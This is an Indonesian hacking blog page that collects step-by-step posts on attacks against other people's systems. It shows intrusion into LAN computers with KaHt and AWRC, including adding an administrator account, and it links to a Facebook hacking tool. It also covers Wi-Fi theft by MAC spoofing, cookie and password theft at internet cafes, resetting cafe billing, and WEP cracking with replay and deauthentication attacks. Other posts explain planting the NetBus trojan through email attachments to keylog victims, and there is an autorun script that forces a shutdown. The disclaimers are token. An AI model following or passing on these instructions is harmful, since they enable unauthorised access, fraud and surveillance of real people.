Pages

Senin, 02 Mei 2011

hack


Banyak cara untuk meremote sebuah komputer melalui jaringan. Salah satunya adalah dengan menggunakan Atelier Web Remote Commander atau dikenal juga dengan AWRC.

Namun apabila dengan menggunakan trojan biasa, meremote sebuah komputer harus terdiri dari dua bagian, yaitu server dan client, namun tidak dengan AWRC. Inilah kemampuan luar biasa yang dimiliki oleh AWRC. Selain itu, software ini juga tidak akan dicurigai oleh firewall maupun pengguna yang pengalaman. Hal ini dikarenakan AWRC menggunakan port yang biasa digunakan oleh Microsoft Network, yaitu port 445 pada Windows 2000, XP, dan 2003 atau port 139 jika port 445 tidak tersedia. Menurut pembuat AWRC yang dilansir dari situs Welcome to the Atelier Web site, high-power network tools and communication tools, programming, shareware., software ini menggunakan teknologi militer. Namun pernyataan ini agak diragukan oleh S'to dalam bukunya Uncensored, Seri Teknik Hacking terbitan tahun 2005.



Sebelum memulai, penulis ingin mengingatkan, bahwa penulis tidak bertanggung jawab atas penyalahgunaan cara-cara yang diuraikan pada artikel ini. Artikel ini digunakan untuk kepentingan ilmu pengetahuan dan pengamanan jaringan.

Oke, kita mulai saja bagaimana cara melakukannya. Intinya cara ini amat sangatlah mudah. Untuk meremote desktop menggunakan AWRC, yang diperlukan hanyalah username dan password yang akan diremote. Bagaimana apabila tidak mempunyai username dan password pada komputer korban? Untuk itulah digunakan KaHt. Untuk mendapatkan software KaHt dan AWRC, silahkan cari dan download dengan menggunakan google. Penulis menggunakan KaHT II dan AWRC versi 5.00. Berikut cara-cara untuk meremote desktop.
1. Instal AWRC di komputer.

2. Download dan salin KaHt. Untuk lebih memudahkan, salin tanpa menggunakan folder. Misalnya salin di drive D.

3. Buka command prompt dan pindahkan posisi ke drive yang ada KaHtnya. Ketik “kaht ” lalu tekan enter. Misalnya yang akan dilakukan adalah masuk ke komputer dengan ip 10.1.1.7. Lalu ketikan perintah “kaht 10.1.1.1 10.1.1.10”. Jangkauan untuk ip address diserahkan kepada pemakai. Tunggu hingga keluar tampilan seperti berikut.

4. Kini kita telah berada di komputer korban. Untuk memasukkan username, ketikan “net user /add” lalu tekan enter. Misalnya kita akan memasukkan divtopln dengan password coba, maka ketikan “net user divtopln coba /add” tekan enter. Apabila keluar tulisan The command completed successfully, berarti kita telah mempunyai user dengan nama divtopln dan password coba yang mempunyai hak akses adminitrator.

5. Sekarang bukalah AWRC yang telah diinstal. Masukan ip address pada remote host, username pada username dan password pada password lalu klik Connect yang ada pada layar kiri bawah. Tunggulah beberapa saat hingga terhubung dan kita akan terlihat tampilan desktop komputer yang telah kita remote. Pada AWRC yang digunakan oleh penulis, kita dapat melihat segalanya mengenai komputer korban.

6. Kegagalan dalam koneksi sangat mungkin terjadi. Hal ini disebabkan karena sistem operasi komputer yang akan diremote tidak mendukung. Sistem operasi tersebut adalah Windows XP Home Edition, 95, 98, Me, dan lain-lain. Selain itu, kemungkinan lainnya adalah service client for Microsoft Network dan file and printer sharing tidak aktif pada komputer korban. Pada Windows XP Profesional, prasyarat tambahannya adalah setting model sharing dan security harus dirubah menjadi classical sharing and security model for local account (atau lihat aja di help setelah software terinstall, kemudian pilih FAQ, disitu banyak sekali keterangan cara pemakaiannya). Untuk mengetahui lebih lengkapnya tentang software ini, bisa dilihat di http://www.atelierweb.com , high-power network tools and communication tools, programming, shareware. atau buku Uncensored, Seni Hacking I yang ditulis oleh S'to dan diterbitkan oleh jasakom.

7. Untuk terhindar dari serangan ini, baik KaHt maupun AWRC, tutup semua port atau gunakan sistem operasi yang disebutkan di atas. Trimakasih dan semoga bermanfaat. :D




pro facebook hack v 1.7 by tn hacker zied



Software ini merupakan software hacker facebook yang dibuat bersamaan dengan softwareFacebook Hacker 1.7 By The Joker dan Data Analys Repaire By Mirel. Software ini diprotect dengan password sehingga untuk dapat menggunakan software ini harus mengetahui passwordnya terlebih dahulu. Silahkan didownload.

download :
http://www.ziddu.com/downloadlink/14639836/facebook_hacker_1.7.rar


sumber: http://cheaterfrozen.blogspot.com/




Tutorial Hacker : Hack Koneksi Wi-Fi untuk Internetan Gratis

Anda pasti ingin bisa internetan gratis. Berikut akan saya berikan tips untuk hacking koneksi Wi-Fi untuk anda yang ingin mencobanya. Tapi sebelumnya saya ingin mengingatkan, bila anda berhasil berarti anda telah melakukan pencurian koneksi Wi-Fi orang lain. Dosa dan resikonya ditanggung sendiri loh…he..he..he…Trik ini hanya untuk mengingatkan bahwa semua sistem keamanan Wi-Fi bisa di hack!!!  Tidak ada niat untuk mengajarkan berbuat jahat, oke? Jika anda tidak paham tentang trik ini. segala pertanyaan anda tidak akan saya jawab!!! silahkan berexperimen sendiri.
Oke, langsung saja, caranya :
Sebelumnya dibutuhkan seperangkat komputer atau laptop yang dilengkapi dengan modem Wi-Fi. Caranya :
1-Download software untuk hack koneksi Wi-Fi (TMACv5 R3) di sini.
2-Kemudian Download juga tool untuk Scan IP di sini.
3-Instal kedua software yang telah anda download tadi.
4-Cari lokasi hotspot atau lokasi yang sinyal Wi-Fi nya bisa terdeteksi oleh anda.
5-Hidupkan laptop atau komputer anda dan buka Wireless Network dan lihat di sistem tray icon wireless network, lalu klik kanan pilih view Available Wireless Network kemudian anda connect ke sinyal Wi-Fi yang terdeteksi oleh anda.
6-Setelah connect,klik kanan sistem tray dan pilih status pada langkah ini anda akan mendapatkan alamat IP yg diberikan kepada kita. Catat IP nya.
7-Berikutnya buka software IP Scanner yg anda download tadi, masukan no Ip yang anda catat tadi misalnya xxx.xxx.x.xx pada kolom IP Range pertama, tetapi pada angka terakhir IP yg anda dapatkan tadi di ganti dengan angka 1, misalnya xxx.xxx.x.xx menjadi xxx.xxx.x.1 lalu pada kolom IP Range kedua masukkan juga IP yg sama tetapi ganti angka 1 menjadi angka 300, maka pada kolom IP Range kedua Ip nya menjadi xxx.xxx.x.300 lalu klik tombol start untuk memulai scanning IP (Tombol Merah ).
8-Setelah melakukan scanning maka kita akan mendapatkan data IP yang hidup dan terkoneksi dengan hotspot tersebut. Kemudian lihat IP yang hidup (alive host) yang warna biru. lalu klik kanan pada IP yg hidup tadi warna biru hasilnya–> Show–> Mac Address jika berhasil maka akan muncul kode Mac Address ( Catatan : Terkadang Tidak Muncul Kode Mac Addressnya coba lagi IP lainnya ) Jika anda berhasil mendapatkan kode Mac Address . Catat Kodenya.
9-Buka Software TMAC v5 R3 yang anda download dan instal ke laptop anda. Cari tombol Change MAC maka akan muncul kolom tempat anda memasukkan kode Mac Adrress yang anda catat tadi.Kemudian tekan Change Now.
Tunggu beberapa saat untuk proses penggantian kode Mac Adrressnya dan koneksi akan terputus sementara dan akan terkoneksi lagi secara otomatis.
10-Langkah terakhir dengan membuka browsing anda untuk internetan gratis.

Cara Memasang Password di Flashdisk Tanpa Software

Banyak aplikasi yang dapat memberi manfaat untuk mengunci flashdisk atau memberi password otomatis ke flashdisk. Tetapi beda yang ini. Cara ini akan otomatis meminta password ketika flashdisk dimasukan ke PC dan jika password salah, maka komputer akan shutdown secara otomatis.
Caranya :
1. Buka Notepad
( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepad dan Enter) lalu copy paste script kode dibawah ini ke notepad
on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject(“Wscript.shell”)
set fs=createobject(“Scripting.FileSystemObject”)
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject(“wscript.shell”)
do while quest=””
quest=inputbox(“Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!“,”http://firmancupes.wordpress.com“)
if quest=”” then
m=MsgBox(“Maaf anda belum memasukkan password…!“, 0+0+48, “http://firmancupes.wordpress.com“)
end if
loop
if quest=”TULIS PASSWORD DISINI” then
s.run “shutdown -a”
sd.run winpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
else
s.run “shutdown -s -t 0″
end if
TULIS PASSWORD DISINI ganti sesuai keinginan anda, itu adalah sebagai tempat password anda. Pemakaian huruf kapital sangat berpengaruh. saya sarankan memakai angka yang sudah diingat di luar kepala.
lalu save as dengan nama “passwordlock.vbs” tanpa tanda kutip, sebelum di save as pastikan pilih all files.
2. setelah selesai diatas.
lalu buka Notepad lagi, untuk pengaturan otomatis setelah flashdisk dimasukan di PC.
copy paste script kode dibawah ini ke notepad.
[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=FLASHDISK TELAH DIPASANG PASSWORD
anda dapat merubah kata “FLASHDISK TELAH DIPASANG PASSWORD” sesuai kata-kata mutiara keinginan anda sendiri.
setelah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah “autorun.inf” tanpa tanda kutip, sebelum di save as pastikan pilih all files.
Kemudian pindahkan kedua file yang telah anda buat tadi (autorun.inf danpasswordlock.vbs) ke dalam flashdisk anda.
langkah terakhir silahkan anda hidden autorun.inf dan passwordlock.vbs yang telah dibuat tadi.
Cara hidden : klik kanan pada masing- masing autorun.inf danpasswordlock.vbs lalu pilih properties centang kotak yang ada di tanda hidden.
Sumber : PedasManisCinta


Trik Mudah Mendapatkan Password dan ID Orang Laen

Sebenarnya Trik ini sangatlah mudah, hanya menggunakan tool yang kecil. Tool ini hanya akan bekerja di warnet saja. Tidak akan mungkin bekerja disuatu rumah anda sendiri. Karena tool ini hanyalah mencuri cookies dari bekas-bekas internet yang dijalankan oleh seseorang seperti membuka friendster, Paypal, facebook, dan lain-lain .
Jadi intinya tool ini akan mengambil semua password yang tersimpan di cookies dari komputer yang habis dipakai untuk Internet.
tetapi ingat sebelum mendownload, tool ini hanya dapat digunakan di Mozilla Firefox saja.
silahkan download dahulu di sini. ukuran file : 40 KB
Keterangan :
jangan pernah dilakukan dirumah. mungkin tool ini terjangkit virus trojan. Kami tidak bertanggung jawab atas semuanya. tapi tenang saja walaupun begitu masih bisa digunakan di warnet karena sebenarnya tool ini hanya mencuri cookiesnya saja. jadi kalau digunakan dirumah rugi cuma dapat password-password milik kita sendiri.
INGAT :
jangan dilakukan untuk merugikan orang lain.
ini hanyalah sekedar pengetahuan tentang hacking.

Cara Hack Billing Versi Baru dengan BillHack

Ditahun baru ini 2011 ane awali dengan share software baru untukhack billing gan , bagi agan2 yang mau ke warnet dan bermain berjam-jam disana namun tidak mau mengeluarkan banyak uang , silahkan baca sejenak artikl ini :
Software yang satu ini namanya Billhack yaitu sebuah software yang berfungsi untuk hack billing warnet. Cara kerjanya jika kamu main internetdi sebuah warnet pasti ada billing kan?? Trus kita main di net itu udah lama udah 2 jam lebih dan harganya pun pasti lumayan mahal..tapi dengan software Billhack ini, kamu bisa mengubah waktunya kembali menjadi seperti pertama kamu maen di net alias kembali lagi waktu dan harganya ke nol. nah untuk cara-caranya silahkan download dulu aplikasinya Download




Nah ini langkah - langkah pake billhack :
  1. download dulu aplikasinya di atas..
  2. siapkan muka culun dech...dari pakaian smuanya lah biar ga ketauan muka kriminal nte gan...
  3. Buka aplikasi billhacknya dan akan tampil seperti ini....
4. pilih single client dan akan tampil seperti ini..



5. buka run di start dan ketikan cmd.
6. setelah muncul ketikan net view maka akan terlihat komputer mana saja yang conect dengan komputer kita, dan cari nama komputer servernya biasanya pake nama SERVER, ADMIN
7. ketikan ping server tersebut contoh ping SERVER maka akan terlihat ip servernya.
8. setelah ketemu ip servernya masukan ip servernya di server ip/name seperti gambar diatas.
9. setelah itu masukan pc numbernya dengan no pc komputer di net kamu. dan isi billing username dengan nama di billing kamu.

10. setelah itu klik hack now.

Software untuk Hack Wireless yang Terpassword

http://t3.gstatic.com/images?q=tbn:ANd9GcQbgE9EDetNKYQqjdqg_oRq3Ji2LUtmWp1QF40lk_6ACiUDT854Nw
Kemaren temen ane nanyain ke ane via chat fb : 
katanya: "Ada Software yang bisa mengetahui password Wireless orang lain yang di lock ga ?"
Tanpa basa- basi ane langsung aja kasih tau dan search google dan ahsil beginilah yang ane dapat , mohon di simak ya gan ?
WIRELESS HACKING TOOL
NetStumbler
Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.
Anda bisa mendapatkannya disini
Aircrack
Tercepat untuk WEP / WPA cracking tool
Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).
Anda dapat memperoleh Aircrack disini
Airsnort
802,11 WEP Encryption Cracking Tool
AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.
Anda dapat memperoleh AirSnort disini
Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.
Anda dapat memperoleh Cowpatty disini
Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini
Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian. Bagus loh.. Coba deh :D
Anda dapat men-download Ethereal disini
Yang lainnya:

AiO Wireless Hack Tools 2009:
• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4 Information File:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Downloadfile :
WIRELESS HACKING TUTORIAL
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.
WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.
Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.
WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.
Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.
Contoh:
alphabet[0] = ‘A’;
alphabet[1] = ‘B’;
void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}
swap(alphabet[0], alphabet[1]);
Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.
Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:
int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++) s[i] = i; int j = 0; // scrambling for (int l = 0; l <= (n – 1); l++) { j += s[l] + k[l]; swap(s[l], s[j]); }
Mari kita telaah kode di atas hingga kita tahu bahwa:
1. Integer ‘n’ menentukan seberapa kuay enkripsi yang kita buat. WEP disini menggunakan 256.
2. Array karakter ‘k’ adalah password rahasia yang dikombinasikan dengan tiga karakter palsu. Hal ini tidak berubah sama sekali dalam program ini.
3. Tanda ’//Inisialisasi’ hanya merupakan inisialisasi, sebanyak karakter 0-255.
4. Integer ‘j’ digunakan untuk memegang nilai selama scrambling. Selalu diinisialisasi ke 0, karena harus selalu di mulai 0.
5. Selanjutnya, (di mana ‘/ / scrambling’) scrambling proses dimulai. Pada dasarnya akan menghasilkan ‘s’ array “acak” dari sebelumnya ‘ s’ array yang ditentukan.
6. Di dalam lingkaran, yang pertama mereka merges password (k) dengan acak array (s) untuk membuat sebuah karakter selesai. Lalu, panggilan untuk swap () menempatkan ke dalam array dari karakter selesai.
Sekarang saatnya untuk bagian kedua dari algoritma RC4, maka Algoritma Pseudo Random Generation (PRGA). Bagian ini output streaming password berdasarkan KSA’s pseudo-acak array. Streaming key ini akan digabung dengan data cleartext untuk menciptakan data yang dienkripsi.
int i = 0;
int j = 0;
int z;
while (data_disini)
{
i++;
j += s[i];
swap(s[i], s[j]);
z = s[s[i] + s[j]];
// z is outputted here
// and then XOR’d with cleartext
}
1. Integers’ i ‘dan’ j ‘telah dideklarasikan dan diinisialisasi ke 0.
2. Terdapat satu lingkaran yang berjalan sampai akhir paket data tersebut tercapai.
3. ‘I’ adalah incremented dalam setiap perulangan dari lingkaran itu agar tetap berjalan.
4. ‘J’ memegang pseudo-nomor acak.
5. Pemanggil lain untuk swap () karakter yang aktif dalam s [i], dan s [j].
6. ‘Z’ dihitung dengan menambahkan s [i], dan s [j] dan mengambil nilai dalam elemen sesuai jumlah mereka. Alasan ini akan dijelaskan nanti.
7. ‘Z’ adalah XOR’d dengan cleartext untuk membuat teks baru dienkripsi.
Berhubung dgn putaran CRC stands for redundancy checksum. Ketika paket-paket yang dikirim ke seluruh jaringan, harus ada cara untuk mengetahui host menerima paket belum rusak dengan cara apapun. Ini adalah tujuan dari CRC. Sebelum data dikirim, CRC menghitung nilai, atau checksum, untuk paket yang akan dikirim dengan paket. Bila diterima, target host menghitung baru dari checksum menggunakan CRC. CRCs Jika cocok, maka paket dari kredibilitas telah dikonfirmasi.
Ringkasnya. Access Point menciptakan pseudo-acak karakter. Mereka bergabung dengan berbagi prechosen password untuk membuat password rahasia. KSA kemudian menggunakan password ini untuk membuat pseudo-acak array, yang digunakan oleh PRGA streaming untuk membuat key. Password ini kemudian di XOR dengan cleartext untuk menciptakan data dienkripsi, dan masuk ke dalam CRC dan membuat checksumnya.
Kemudian, untuk penerimaan host decrypts. Karakter ditambahkan oleh AP yang akan dihapus dan digabung dengan key untuk dikirim kembali bersama dengan password rahasia. Password masuk melalui seluruh proses RC4, dan XOR’d dengan teks terenkripsi, dan menciptakan cleartext checksum. Checksum akan dihapus dan dibuat yang kemudian dibandingkan untuk melihat apakah data selamat, dan apakah ini merupakan pengguna asli.
Bagian II: Cracking WEP
Sebelum kita masuk cracking WEP, mari kita bahas beberapa flaws dalam proses enkripsi:
* Ada 5% kesempatan bahwa nilai dalam s [0]-s [3] tidak akan berubah setelah tiga Iterasi oleh KSA.
* Yang pertama nilai dalam data dienkripsi adalah SNAP, yang 0xAA, atau 170 basis 10. Sniffing pertama dari byte dan teks terenkripsi XOR-ing dengan 170 akan memberikan output byte pertama dari PRGA.
* J format tertentu yang byte yang diberikan oleh AP akan menunjukkan bahwa ia adalah lemah dan mudah untuk di crack. Format ini (B + 3, 255, X), dimana B adalah byte dari password rahasia. Dimana X dapat bernilai apapun.
Kita akan berbicara tentang KSA sekarang. Mari kita menetapkan beberapa variabel untuk “pengujian”:
* Karakter kode yang diambil dari AP adalah 3255,7. Kami sniffed itu dari udara. Kami akan menggunakannya karena hasil tes telah menunjukkan itu adalah kode yang sangat lemah.
* Shared passwordnya adalah 22222. Dalam prakteknya, Anda tidak akan tahu ini.
* N adalah 256.
* Jika ada nilai di atas 256, modulo operasi akan digelar di atasnya. Nilai yang dihasilkan itulah yang akan digunakan.
* Array ‘s’ telah dipastikan, dengan nilai 0-255.
Buka program Kismet. Kismet adalah scanner nirkabel bebas untuk Linux. Bila Anda membukanya, Anda akan melihat daftar WLAN yang berada dalam jangkauan. Pilih salah satu dan buat catatan dari keempat rincian berikut ini (perlu diketahui bahwa target komputer didapat dari setiap host pada WLAN):
* AP MAC Address
* MAC Address komputer target.
* WEP – Key digunakan
* Wi-Fi- saluran yang digunakan
Buka Aircrack dan anda akan mulai menangkap paket-paket. Anda juga akan menangkap IVs. Tapi ini memakan waktu lama. Ia bahkan dapat berlangsung selama beberapa jam atau hari untuk menangkap jumlah IVs ke crack password WEP.
Untungnya, kami dapat mempercepatnya. Misalnya, jika WLAN sangat sibuk, maka akan lebih banyak lalu lintas paket IVs, sehingga IVs lebih mudah diambil. Jika kami terus ping ke jaringan, akan menghasilkan lebih banyak paket data.
ping-t-l 50000 ip_address
Jadi apa yang harus dilakukan sekarang? Kami memiliki sedikit data, tetapi kita harus mendapatkan password WEP di sini. Ada waktu untuk meloloskan void11. Void11 yang di deauthenticate AP ke semua host yang ada disana. Cutting off dilakukan hingga ke seluruh host. Hal pertama yang dilakukan dalam hal ini adalah automaticall yang akan mencoba untuk menyambung kembali koneksi ke AP.
Namun ada teknik lain yang disebut replay attack. Ini menangkap sebuah paket dari sebuah host pada WLAN, kemudian melakukan spoofs host dan terus mengulang paket berulang ulang. Menghasilkan lalu lintas paket data yang sangat besar. Yang terbaik dari program ini adalah airreplay. Ini adalah untuk apa void11 digunakan.
Buka airodump. Sekarang, ucapkan terima kasih kepada Replay Attack. IV berjalan sekitar 200 per detik. Wow! Anda mungkin akan mendapatkan semua paket yang diperlukan dalam waktu 10 menit. Semua IVs sedang ditulis ke dalam file yang akan diambil. Kemudian buka aircrack. Aircrack akan membaca semua IVs yang di ambil dari file, dan melakukan analisis statistik pada file tsb. Lalu, ia akan berusaha untuk brute force file” yang ada. Setelah menemukan passwordnya, password itu akan diberikan pada anda.
Hehehe.. Finally: Kamu sudah mendapatkan passwordnya


LanShutDown - remote shutdown or remote reboot a computer

LanShutDown is made for computer shutdown and/or reboot under Windows 2000/XP/2003 control both locally or in the net. In addition you can write a message to be shown before shutdown. It is obligatory to have Administrator rights to shutdown a remote computer.
LanShutDown - remote shutdown or remote reboot a computer
LanShutDown complies only with Windows 2000/XP/2003.
LanShutDown program package includes two console programs: 





  • LanShutdownÑ (LanShutdownC.exe) — console program for computer remote shutdown;
    LanShutDownC.exe
















  • ShutdownÑ (ShutdownC.exe) — console program to control local computer power.
    ShutDownC.exe
    These program versions make remote hosts shutdown and/or reboot processes fully automated if you use command files (bat or cmd).
    We hope that LanShutDown will help you to carry out shutdown of remote computers and power control of the local computer.


    NETBUS

    gu, 14 Februari 2010
    membobol komputer orang lain dengan NETBUS


    NetBus adalah program hacking karya Carl- Fredrik Neikter seorang hacker asal Swedia yang di buat dengan bahasa Delphi. Program ini dapat bekerja pada sistem operasi Windows 95/98/ Me/2000/XP dan NT. NetBus pertama kali muncul pada tahun 1998 dengan versi 1.60 kemudian keluar NetBus versi 1.70 pada tahun yang sama. Ada juga NetBus Pro v2.01 dan NetBus Pro v2.10 yang dirilis tahun 1999. Hingga saat ini, Netbus masih menjadi salah satu ancaman keamanan komputer.

    Hacking dengan Netbus
    Sebelum melakukan hacking, pastikan versi NetBus yang akan di gunakan. Jika menggunakan NetBus versi 1.60 atau NetBus versi 1.70, maka port yang di lacak adalah port nomor 12345. Untuk NetBus Pro versi 2.01 dan NetBus Pro v2.10, port yang di cari adalah port 20034.

    Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe sebesar 559.552 KB dan Patch.exe dengan kapasitas 494.592 KB. NetBus.exe merupakan file pengendali yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer “korban”.

    Ada beberapa cara untuk “menanam” file Patch.exe di komputer “korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke Folder Windows. Atau gunakan cara lain yang aman untuk menyebarkan file patch.

    Tahap selanjutnya adalah menentukan host atau alamat IP yang di-hack. Untuk mencari alamat host dan IP Address yang terifeksi patch.exe, klik tombol Scan lalu klik tombol Start. Isi kotak Scan dengan IP Address awal dan kotak To dengan IP Address akhir. Tunggu beberapa saat, jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu kita bisa melakukan apa yang kita sukai, termasuk menyadap password email orang lain.

    Selanjutnya, kita copy salah satu alamat IP tersebut, paste ke field Host name/IP pada jendela utama program NetBus. Klik tombol Connect. Jika user tersebut belum memutuskan koneksinya ke Internet maka kita akan melihat pesan status koneksi di jendela program NetBus yang menunjukkan sudah terhubung.

    Kini kita dapat melakukan beberapa hal terhadap komputer korban. Pada NetBus tersedia sedikitnya 22 tombol, klik tombol “Active wnds” untuk melihat semua program yang sedang dijalankan orang tersebut di komputernya. Atau jika kita tertarik untuk melihat apa yang sedang diketik, maka klik tombol “Listen.” Anda akan melihat jendela seperti yang terlihat pada gambar di atas. Selanjutnya, silahkan bereksperimen sendiri dengan program ini, mudah bukan?

    Download Netbus :
    - Netbus 1.70
    - Netbus 2.01 Pro

    Antisipasi serangan Netbus
    1. Update terus antivirus di computer anda, karena Netbus masuk kategori virus Trojan
    2. Install sebuah firewall bernama Snort untuk mendeteksi para penyusup. Software ini bisa di peroleh secara gratis di www.snort.org
    3. Pasang software proxy berbasis firewall seperti zona alarm yang bertujuan memfilter dan mengontrol semua lalu-lintas data yang masuk dan selama ini cukup dipercaya mampu melindungi komputer dari gangguan hacker atau cracker. Penjelasan tentang Zona alarm dan downloadnya di
    http://www.cyberal13nated.co.cc/2010/01/download-free-koleksi-zone-alarm.html
    4. Install NetBus Detective 5.2. Software ini adalah specialist pendeteksi Netbus semua versi.

    internet maniac


    kategori : [hacking and security]
    author : [^badman^]

    Tutorial remote komputer memang sudah ada di versi standardnya namun banyak sekali yang bertanya tentang remote komputer kepada webmaster bahkan sampai ditanyakan beberapa kali lewat via e-mail, untuk itu maka disini bagi yang belum pernah melakukan remote komputer maka anda dapat masuk dihalaman ini.

    Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

    Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

    Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

    internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac
    Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

    KaHT (KaHt.exe) ... Download program hacker KaHT
    Berfungsi sebagai program untuk menerobos ke computer server atau client

    Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

    Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

    Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
    Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

    Untuk Windows XP
    Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

    Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
    Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
    (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

    Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac
    Download IManiac......

    Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

    Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

    Cara masuk DOS Mode
    Untuk Windows XP :
    Masuklah ke Start, All programs, Accessories lalu Command Prompt
    Untuk Windows 95/98/Me/NT/2000
